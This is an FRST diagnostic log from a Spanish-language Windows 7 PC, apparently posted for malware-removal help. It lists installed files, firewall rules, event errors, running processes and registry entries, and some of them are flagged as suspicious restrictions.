2017-07-04 19:52 - 2017-12-15 16:59 - 002558752 _____ () C:\Program Files (x86)\Steam\video.dll
2017-12-15 17:40 - 2017-11-03 22:54 - 005137696 _____ () C:\Program Files (x86)\Steam\libavcodec-57.dll
2017-12-15 17:40 - 2017-11-03 22:54 - 000847136 _____ () C:\Program Files (x86)\Steam\libavutil-55.dll
2017-12-15 17:40 - 2017-11-03 22:54 - 000695584 _____ () C:\Program Files (x86)\Steam\libavformat-57.dll
2017-12-15 17:40 - 2017-11-03 22:54 - 000351520 _____ () C:\Program Files (x86)\Steam\libavresample-3.dll
2017-12-15 17:40 - 2017-11-03 22:54 - 000783648 _____ () C:\Program Files (x86)\Steam\libswscale-4.dll
2017-07-04 19:52 - 2017-12-15 16:59 - 000904992 _____ () C:\Program Files (x86)\Steam\bin\chromehtml.DLL
2017-07-04 19:52 - 2016-07-04 19:17 - 000266560 _____ () C:\Program Files (x86)\Steam\openvr_api.dll
2017-07-04 19:53 - 2017-09-06 23:04 - 000678400 _____ () C:\Program Files (x86)\Steam\bin\cef\cef.win7\SDL2.dll
2017-07-04 19:53 - 2017-10-31 01:44 - 071471904 _____ () C:\Program Files (x86)\Steam\bin\cef\cef.win7\libcef.dll
2017-07-04 19:52 - 2015-09-24 20:52 - 000119208 _____ () C:\Program Files (x86)\Steam\winh264.dll
2018-01-08 23:54 - 2018-01-08 17:52 - 001891832 _____ () C:\Users\Franco\AppData\Local\Discord\app-0.0.300\ffmpeg.dll
2018-01-08 23:55 - 2018-01-08 23:55 - 001780216 _____ () \\?\C:\Users\Franco\AppData\Roaming\discord\0.0.300\modules\discord_overlay2\discord_overlay2.node
2018-01-08 23:54 - 2018-01-08 17:52 - 001937912 _____ () C:\Users\Franco\AppData\Local\Discord\app-0.0.300\libglesv2.dll
2018-01-08 23:54 - 2018-01-08 17:52 - 000095736 _____ () C:\Users\Franco\AppData\Local\Discord\app-0.0.300\libegl.dll
2018-01-08 23:55 - 2018-01-08 23:55 - 009804280 _____ () \\?\C:\Users\Franco\AppData\Roaming\discord\0.0.300\modules\discord_voice\discord_voice.node
2018-01-08 23:55 - 2018-01-08 23:55 - 001505784 _____ () \\?\C:\Users\Franco\AppData\Roaming\discord\0.0.300\modules\discord_utils\discord_utils.node
2018-01-08 23:55 - 2018-01-08 23:55 - 000513016 _____ () \\?\C:\Users\Franco\AppData\Roaming\discord\0.0.300\modules\discord_erlpack\discord_erlpack.node
2018-01-08 23:55 - 2018-01-08 23:55 - 002662904 _____ () \\?\C:\Users\Franco\AppData\Roaming\discord\0.0.300\modules\discord_rpc\discord_rpc.node
2018-01-08 23:55 - 2018-01-08 23:55 - 001517048 _____ () \\?\C:\Users\Franco\AppData\Roaming\discord\0.0.300\modules\discord_game_utils\discord_game_utils.node
2018-01-08 23:55 - 2018-01-08 23:55 - 002749944 _____ () \\?\C:\Users\Franco\AppData\Roaming\discord\0.0.300\modules\discord_contact_import\discord_contact_import.node
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
AlternateDataStreams: C:\Users\Franco\AppData\Local\Mjc7tFDl:8ozO9lwap8D2aIzrlH [2270]
AlternateDataStreams: C:\Users\Franco\AppData\Local\Temp:ctdNU4MXUVOLiXUVWJ4jPCjB [2028]
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
 
==================== Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
 
==================== Hosts content: ===============================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2009-07-13 23:34 - 2009-06-10 18:00 - 000000824 _____ C:\Windows\system32\Drivers\etc\hosts
 
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-2176517476-3644118065-910164434-1000\Control Panel\Desktop\\Wallpaper -> 
DNS Servers: 200.42.4.199 - 200.49.130.51
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)
Windows Firewall is disabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
MSCONFIG\Services: AdobeFlashPlayerUpdateSvc => 3
MSCONFIG\Services: gupdate => 2
MSCONFIG\Services: gupdatem => 3
MSCONFIG\Services: SwitchBoard => 3
MSCONFIG\startupreg: AdobeAAMUpdater-1.0 => "C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe"
MSCONFIG\startupreg: AdobeCS6ServiceManager => "C:\Program Files (x86)\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe" -launchedbylogin
MSCONFIG\startupreg: Akamai NetSession Interface => "C:\Users\Franco\AppData\Local\Akamai\netsession_win.exe"
MSCONFIG\startupreg: DAEMON Tools Lite Automount => "C:\Program Files\DAEMON Tools Lite\DTAgent.exe" -autorun
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
MSCONFIG\startupreg: SwitchBoard => C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [{B8623A1A-D59F-4239-8AF9-9D75A7D265EA}] => (Allow) C:\Program Files\AVAST Software\SZBrowser\3.55.2393.596\SZBrowser.exe
FirewallRules: [TCP Query User{47EC3903-1218-4B2E-A5E0-3455F606BEF3}C:\users\franco\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\franco\appdata\local\akamai\netsession_win.exe
FirewallRules: [UDP Query User{3E98CFA7-7183-45E9-AED8-76261037A05F}C:\users\franco\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\franco\appdata\local\akamai\netsession_win.exe
FirewallRules: [{80E78FBB-B887-46E1-AC75-4BEFABAC7983}] => (Allow) C:\Program Files\AVAST Software\SZBrowser\3.55.2393.607\SZBrowser.exe
FirewallRules: [{10169188-AA69-4F87-A13E-0E4D23A1C0A9}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{DFB5F6F8-0C86-4439-8F28-069D164F83A8}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{A17B3358-2D89-4B19-959E-38FAD29560D6}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{A3DE7EDB-73A9-4244-8664-141E1F35C232}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [TCP Query User{4BF06B6B-2D73-4CDF-8A20-3C371F945B48}C:\users\franco\appdata\roaming\gameranger\gameranger\gameranger.exe] => (Allow) C:\users\franco\appdata\roaming\gameranger\gameranger\gameranger.exe
FirewallRules: [UDP Query User{7DAE0878-D1BC-46B5-8988-0B0C27930B37}C:\users\franco\appdata\roaming\gameranger\gameranger\gameranger.exe] => (Allow) C:\users\franco\appdata\roaming\gameranger\gameranger\gameranger.exe
FirewallRules: [TCP Query User{A6C45444-FFBF-452A-AAB7-9A5C0C0F24AA}D:\terraria v1.3.5.3 rus\terrariaserver.exe] => (Allow) D:\terraria v1.3.5.3 rus\terrariaserver.exe
FirewallRules: [UDP Query User{F681EE89-1B3F-461C-88DF-2D5C30FD046B}D:\terraria v1.3.5.3 rus\terrariaserver.exe] => (Allow) D:\terraria v1.3.5.3 rus\terrariaserver.exe
FirewallRules: [{D8ED11CE-6501-4F22-9B64-82048ECCA422}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{FD40BA23-A665-4C8B-A738-F5C1B86248F7}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{077CAC7A-16E9-4267-8B22-960A3853E2B9}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{A3847F28-9730-4F9B-B05D-5A66A1DAA00B}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{0C202732-6D57-4A44-9143-27159B6DB8E9}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Left 4 Dead 2\left4dead2.exe
FirewallRules: [{1F5942F0-A990-4202-930B-9C8635F760C1}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Left 4 Dead 2\left4dead2.exe
FirewallRules: [{9570BFEE-1749-4270-BA79-1DA5D662889B}] => (Allow) C:\Program Files\AVAST Software\SZBrowser\3.55.2393.609\SZBrowser.exe
FirewallRules: [{97A29667-3619-4938-87CE-11C812C60E5F}] => (Allow) C:\Program Files\AVAST Software\SZBrowser\4.58.2552.909\SZBrowser.exe
FirewallRules: [{D014278F-E2D3-4C9C-AE8A-35E50308EA77}] => (Allow) C:\Program Files (x86)\BlueStacks\HD-Plus-Service.exe
FirewallRules: [{FEDD7AAE-0059-4061-B469-5EAE5027745D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Brawlhalla\Brawlhalla.exe
FirewallRules: [{46B33AB8-CF86-472A-BA2D-8DA5F60B31E6}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Brawlhalla\Brawlhalla.exe
FirewallRules: [TCP Query User{394ABA4B-F95E-428D-9929-7ECF72E6F91E}C:\aeriagames\h&d 2\hidden & dangerous 2\hd2_sabresquadron.exe] => (Allow) C:\aeriagames\h&d 2\hidden & dangerous 2\hd2_sabresquadron.exe
FirewallRules: [UDP Query User{5528C790-C050-4E21-AF23-BC5F36829804}C:\aeriagames\h&d 2\hidden & dangerous 2\hd2_sabresquadron.exe] => (Allow) C:\aeriagames\h&d 2\hidden & dangerous 2\hd2_sabresquadron.exe
FirewallRules: [TCP Query User{B77BB40F-B0FB-4232-8530-E4E214F51C04}C:\windows\syswow64\dpnsvr.exe] => (Allow) C:\windows\syswow64\dpnsvr.exe
FirewallRules: [UDP Query User{16832289-B99F-4E72-9DA8-B8389902E954}C:\windows\syswow64\dpnsvr.exe] => (Allow) C:\windows\syswow64\dpnsvr.exe
FirewallRules: [TCP Query User{65AAC54B-C5D7-44CE-B801-4AAC2D7FE3DC}C:\program files\java\jre1.8.0_151\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_151\bin\javaw.exe
FirewallRules: [UDP Query User{1612FE1B-3504-4B5D-A1C7-C10C934BED79}C:\program files\java\jre1.8.0_151\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_151\bin\javaw.exe
FirewallRules: [TCP Query User{C041F874-FDCA-4AB3-8E6C-F2A1C7DF6249}C:\users\franco\appdata\local\akamai\netsession_win.exe] => (Block) C:\users\franco\appdata\local\akamai\netsession_win.exe
FirewallRules: [UDP Query User{8475042F-814C-425B-A6A8-E3720EA94D40}C:\users\franco\appdata\local\akamai\netsession_win.exe] => (Block) C:\users\franco\appdata\local\akamai\netsession_win.exe
FirewallRules: [{4D26550C-6631-4120-8F07-275DB5DE8974}] => (Allow) LPort=49172
FirewallRules: [{7B0FFCAF-4F00-4545-9380-5B88C70ED124}] => (Allow) LPort=5000
FirewallRules: [TCP Query User{76480B70-EA79-498E-8580-6EFD90E7F33F}D:\ctw\craft.the.world.v1.4.009.lan.[mar repack]\data\craftworld.exe] => (Allow) D:\ctw\craft.the.world.v1.4.009.lan.[mar repack]\data\craftworld.exe
FirewallRules: [UDP Query User{249A2143-E989-4F5A-9164-82F3CE410B12}D:\ctw\craft.the.world.v1.4.009.lan.[mar repack]\data\craftworld.exe] => (Allow) D:\ctw\craft.the.world.v1.4.009.lan.[mar repack]\data\craftworld.exe
FirewallRules: [{5C958D52-6D10-4A32-8F6B-B0CB17EF8F4C}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Battlerite\Battlerite.exe
FirewallRules: [{036285F0-7B39-4794-8806-D1E819B46240}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Battlerite\Battlerite.exe
FirewallRules: [TCP Query User{2F261C7D-7237-489B-AFB5-AF1A7DB2C6CC}C:\program files\killingfloor\system\killingfloor.exe] => (Allow) C:\program files\killingfloor\system\killingfloor.exe
FirewallRules: [UDP Query User{233B9B95-4A70-4B0E-8A37-3098C937D6C6}C:\program files\killingfloor\system\killingfloor.exe] => (Allow) C:\program files\killingfloor\system\killingfloor.exe
FirewallRules: [TCP Query User{B130D0DD-0E4E-4231-817B-EFF1695A2912}C:\program files\dungeon siege\dsloa.exe] => (Allow) C:\program files\dungeon siege\dsloa.exe
FirewallRules: [UDP Query User{527FA157-05BB-4420-9B93-9D4CC3832345}C:\program files\dungeon siege\dsloa.exe] => (Allow) C:\program files\dungeon siege\dsloa.exe
FirewallRules: [{FE4038FC-BB52-4C7E-9BB7-6D12EFDE3F7A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Crypt of the NecroDancer\NecroDancer.exe
FirewallRules: [{1CBC02AB-F03B-43B7-ACC0-95A4875B8D64}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Crypt of the NecroDancer\NecroDancer.exe
FirewallRules: [TCP Query User{CC6468EC-1B20-4B37-8800-5788658EDD06}C:\program files (x86)\epic games\launcher\portal\binaries\win32\epicgameslauncher.exe] => (Allow) C:\program files (x86)\epic games\launcher\portal\binaries\win32\epicgameslauncher.exe
FirewallRules: [UDP Query User{A6ED55D5-8CE4-4226-9D5C-32F5047AFDB6}C:\program files (x86)\epic games\launcher\portal\binaries\win32\epicgameslauncher.exe] => (Allow) C:\program files (x86)\epic games\launcher\portal\binaries\win32\epicgameslauncher.exe
FirewallRules: [TCP Query User{3F39910A-8052-4EC5-8E43-EB36443C95EE}C:\program files (x86)\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe] => (Allow) C:\program files (x86)\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe
FirewallRules: [UDP Query User{62D0705A-D240-4115-8A95-D57B5980B271}C:\program files (x86)\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe] => (Allow) C:\program files (x86)\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe
FirewallRules: [TCP Query User{97CF3E2A-7157-4139-852F-E5343397BE5E}C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe] => (Allow) C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe
FirewallRules: [UDP Query User{6866E3B2-589E-4A15-999B-C237E68051F0}C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe] => (Allow) C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe
FirewallRules: [{782BC035-EF86-4495-82CF-9677E64BAAF9}] => (Allow) D:\SteamLibrary\steamapps\common\BrainOut\bin\javaw.exe
FirewallRules: [{443D8DA7-F129-4FC6-90DC-184C1288FDF6}] => (Allow) D:\SteamLibrary\steamapps\common\BrainOut\bin\javaw.exe
FirewallRules: [TCP Query User{62862246-EE3B-496D-B62F-47562C4EA917}D:\steamlibrary\steamapps\common\battle chasers nightwar\bc.exe] => (Allow) D:\steamlibrary\steamapps\common\battle chasers nightwar\bc.exe
FirewallRules: [UDP Query User{CFA150ED-2B91-4FE9-B95E-FA5541D77543}D:\steamlibrary\steamapps\common\battle chasers nightwar\bc.exe] => (Allow) D:\steamlibrary\steamapps\common\battle chasers nightwar\bc.exe
FirewallRules: [{63ED1EDB-6AF0-4BEF-8847-E1F1C1179BC1}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{A2E1458D-D524-4C46-A481-D891F4E2535B}] => (Allow) D:\SteamLibrary\steamapps\common\VRChat\VRChat.exe
FirewallRules: [{F4DD66BA-C5B4-45C8-9E42-8CF64E7DA190}] => (Allow) D:\SteamLibrary\steamapps\common\VRChat\VRChat.exe
FirewallRules: [TCP Query User{D1EF1EB9-E677-417F-A40A-10596347AE65}C:\program files\unity\editor\unity.exe] => (Block) C:\program files\unity\editor\unity.exe
FirewallRules: [UDP Query User{A8CE466B-0791-4681-A348-1B30CDDD1770}C:\program files\unity\editor\unity.exe] => (Block) C:\program files\unity\editor\unity.exe
FirewallRules: [{AB7FC2F2-6C25-480F-9DD4-EAF25304FA4D}] => (Allow) D:\SteamLibrary\steamapps\common\nmrih\sdk\hl2.exe
FirewallRules: [{88E6C9A4-C8EC-4B57-97BA-DD2A68760ED0}] => (Allow) D:\SteamLibrary\steamapps\common\nmrih\sdk\hl2.exe
 
==================== Restore Points =========================
 
07-01-2018 21:23:20 Installed LogMeIn Hamachi
07-01-2018 21:34:42 Installed Java 7 Update 51
12-01-2018 02:06:59 Installed Gtk# for .Net 2.12.26
15-01-2018 19:59:16 Removed OEM Application Profile
15-01-2018 20:02:09 Removed Gtk# for .Net 2.12.26
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (01/15/2018 07:54:19 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: No se pudo reactivar el filtro de eventos con la consulta "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" en el espacio de nombres "//./root/CIMV2" por el error 0x80041003. Los eventos no se podrán entregar a través de este filtro hasta que se corrija este problema.
 
Error: (01/15/2018 07:53:48 PM) (Source: amdacpusrsvc) (EventID: 0) (User: )
Description: Event-ID 0
 
Error: (01/15/2018 02:12:46 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nombre de la aplicación con errores: mmc.exe, versión: 6.1.7600.16385, marca de tiempo: 0x4a5bc808
Nombre del módulo con errores: mmc.exe, versión: 6.1.7600.16385, marca de tiempo: 0x4a5bc808
Código de excepción: 0xc0000094
Desplazamiento de errores: 0x0000000000034f82
Id. del proceso con errores: 0x%9
Hora de inicio de la aplicación con errores: 0xmmc.exe0
Ruta de acceso de la aplicación con errores: mmc.exe1
Ruta de acceso del módulo con errores: mmc.exe2
Id. del informe: mmc.exe3
 
Error: (01/14/2018 10:39:17 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: No se pudo reactivar el filtro de eventos con la consulta "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" en el espacio de nombres "//./root/CIMV2" por el error 0x80041003. Los eventos no se podrán entregar a través de este filtro hasta que se corrija este problema.
 
Error: (01/14/2018 10:38:44 PM) (Source: amdacpusrsvc) (EventID: 0) (User: )
Description: Event-ID 0
 
Error: (01/14/2018 08:36:50 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nombre de la aplicación con errores: 594615014.exe, versión: 0.0.0.0, marca de tiempo: 0x2a425e19
Nombre del módulo con errores: unknown, versión: 0.0.0.0, marca de tiempo: 0x00000000
Código de excepción: 0xc0000005
Desplazamiento de errores: 0x0000e610
Id. del proceso con errores: 0x17e8
Hora de inicio de la aplicación con errores: 0x01d38d9087a804f8
Ruta de acceso de la aplicación con errores: C:\Users\Franco\AppData\Local\Temp\594615014.exe
Ruta de acceso del módulo con errores: unknown
Id. del informe: cac203e9-f983-11e7-91d4-d0509965a841
 
Error: (01/14/2018 02:46:25 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: No se pudo reactivar el filtro de eventos con la consulta "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" en el espacio de nombres "//./root/CIMV2" por el error 0x80041003. Los eventos no se podrán entregar a través de este filtro hasta que se corrija este problema.
 
Error: (01/14/2018 02:45:20 PM) (Source: amdacpusrsvc) (EventID: 0) (User: )
Description: Event-ID 0
 
Error: (01/14/2018 02:34:38 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: No se pudo reactivar el filtro de eventos con la consulta "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" en el espacio de nombres "//./root/CIMV2" por el error 0x80041003. Los eventos no se podrán entregar a través de este filtro hasta que se corrija este problema.
 
Error: (01/14/2018 02:34:19 PM) (Source: ATIeRecord) (EventID: 16387) (User: )
Description: ATI EEU Service event error
 
 
System errors:
=============
Error: (01/15/2018 07:53:57 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: El siguiente controlador de inicio del sistema o de inicio del arranque no se cargó correctamente: 
cdrom
 
Error: (01/15/2018 07:53:50 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: El servicio Solvusoft Suite Service no pudo iniciarse debido al siguiente error: 
El servicio no respondió a tiempo a la solicitud de inicio o de control.
 
Error: (01/15/2018 07:53:50 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Se agotó el tiempo de espera (30000 ms) para la conexión con el servicio Solvusoft Suite Service.
 
Error: (01/15/2018 07:53:25 PM) (Source: EventLog) (EventID: 6008) (User: )
Description: El cierre anterior del sistema a las 08:40:27 a.m. del ‎15/‎01/‎2018 resultó inesperado.
 
Error: (01/14/2018 10:38:48 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: El siguiente controlador de inicio del sistema o de inicio del arranque no se cargó correctamente: 
cdrom
 
Error: (01/14/2018 10:38:44 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: El servicio Solvusoft Suite Service no pudo iniciarse debido al siguiente error: 
El servicio no respondió a tiempo a la solicitud de inicio o de control.
 
Error: (01/14/2018 10:38:44 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Se agotó el tiempo de espera (30000 ms) para la conexión con el servicio Solvusoft Suite Service.
 
Error: (01/14/2018 10:38:38 PM) (Source: BugCheck) (EventID: 1001) (User: )
Description: El equipo se reinició después de una comprobación de errores. La comprobación de errores fue: 0x000000ea (0xfffffa8004688940, 0x0000000000000000, 0x0000000000000000, 0x0000000000000000). Se guardó un volcado en: C:\Windows\MEMORY.DMP. Id. de informe: 011418-16239-01.
 
Error: (01/14/2018 10:38:38 PM) (Source: EventLog) (EventID: 6008) (User: )
Description: El cierre anterior del sistema a las 10:36:35 p.m. del ‎14/‎01/‎2018 resultó inesperado.
 
Error: (01/14/2018 02:45:23 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: El siguiente controlador de inicio del sistema o de inicio del arranque no se cargó correctamente: 
cdrom
 
 
CodeIntegrity:
===================================
  Date: 2017-05-23 19:25:16.578
  Description: Windows no puede comprobar la integridad de imagen del archivo \Device\HarddiskVolume3\Users\Franco\AppData\Local\Temp\Rar$EXa0.786\kerneld.x64 porque el hash del archivo no se encuentra en el sistema. Puede que un cambio reciente de hardware o software haya instalado un archivo dañado o con una firma incorrecta, o que exista un software malintencionado de origen desconocido.
 
  Date: 2017-05-23 19:25:16.547
  Description: Windows no puede comprobar la integridad de imagen del archivo \Device\HarddiskVolume3\Users\Franco\AppData\Local\Temp\Rar$EXa0.786\kerneld.x64 porque el hash del archivo no se encuentra en el sistema. Puede que un cambio reciente de hardware o software haya instalado un archivo dañado o con una firma incorrecta, o que exista un software malintencionado de origen desconocido.
 
 
==================== Memory info =========================== 
 
Processor: AMD A10-7850K Radeon R7, 12 Compute Cores 4C+8G
Percentage of memory in use: 71%
Total physical RAM: 3521.23 MB
Available physical RAM: 1012.19 MB
Total Virtual: 7040.64 MB
Available Virtual: 4239.25 MB
 
==================== Drives ================================
 
Drive c: () (Fixed) (Total:833.85 GB) (Free:678.19 GB) NTFS
Drive d: () (Fixed) (Total:97.56 GB) (Free:16.08 GB) NTFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 000E78F2)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=97.6 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=833.9 GB) - (Type=07 NTFS)
 
==================== End of Addition.txt ============================

Ran by Franco (administrator) on POROTA (15-01-2018 20:04:22)
Running from C:\Users\Franco\Downloads
Loaded Profiles: Franco (Available Profiles: Franco)
Platform: Windows 7 Professional Service Pack 1 (X64) Language: Español (España, internacional)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(AMD) C:\Windows\System32\atiesrxx.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Advanced Micro Devices) C:\Program Files\AMD\{920DEC42-4CA5-4d1d-9487-67BE645CDDFC}\amdacpusrsvc.exe
(H.D.S. Hungary) D:\Hard Disk Sentinel\HDSentinel.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe
(Advanced Micro Devices, Inc.) C:\Program Files (x86)\ATI Technologies\AMDUSB3DeviceDetector\nusb3mon.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastUI.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Valve Corporation) C:\Program Files (x86)\Steam\Steam.exe
(Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
(Discord Inc.) C:\Users\Franco\AppData\Local\Discord\app-0.0.300\Discord.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Discord Inc.) C:\Users\Franco\AppData\Local\Discord\app-0.0.300\Discord.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Discord Inc.) C:\Users\Franco\AppData\Local\Discord\app-0.0.300\Discord.exe
(Microsoft Corporation) C:\Windows\System32\msiexec.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 
==================== Registry (Whitelisted) ===========================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvLaunch.exe [246120 2018-01-07] (AVAST Software)
HKLM\...\Run: [NUSB3MON] => C:\Program Files (x86)\ATI Technologies\AMDUSB3DeviceDetector\nusb3mon.exe [97280 2012-04-11] (Advanced Micro Devices, Inc.)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [18290688 2017-03-29] (Realtek Semiconductor)
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-2176517476-3644118065-910164434-1000\...\Run: [AdobeBridge] => [X]
HKU\S-1-5-21-2176517476-3644118065-910164434-1000\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3111712 2017-12-15] (Valve Corporation)
HKU\S-1-5-21-2176517476-3644118065-910164434-1000\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [10024624 2017-11-08] (Piriform Ltd)
HKU\S-1-5-21-2176517476-3644118065-910164434-1000\...\MountPoints2: {cdcb5ac8-5cfb-11e7-9ef6-d0509965a841} - F:\setup.exe
HKU\S-1-5-21-2176517476-3644118065-910164434-1000\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Windows\VIDEOWLP.SCR
Startup: C:\Users\Franco\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Animated Wallpaper.lnk [2017-11-19]
ShortcutTarget: Animated Wallpaper.lnk -> C:\Program Files\Animated Wallpaper\Video Wallpaper\Launch Wallpaper.exe (No File)
GroupPolicy: Restriction <==== ATTENTION
GroupPolicy\User: Restriction <==== ATTENTION
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Tcpip\Parameters: [DhcpNameServer] 200.42.4.199 200.49.130.51
Tcpip\..\Interfaces\{AC0E2BB8-627F-45DA-94BE-23253C878688}: [DhcpNameServer] 200.42.4.199 200.49.130.51
 
Internet Explorer:
==================
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.com/?bcutc=sp-006
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxps://www.google.com/search?bcutc=sp-006&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = 
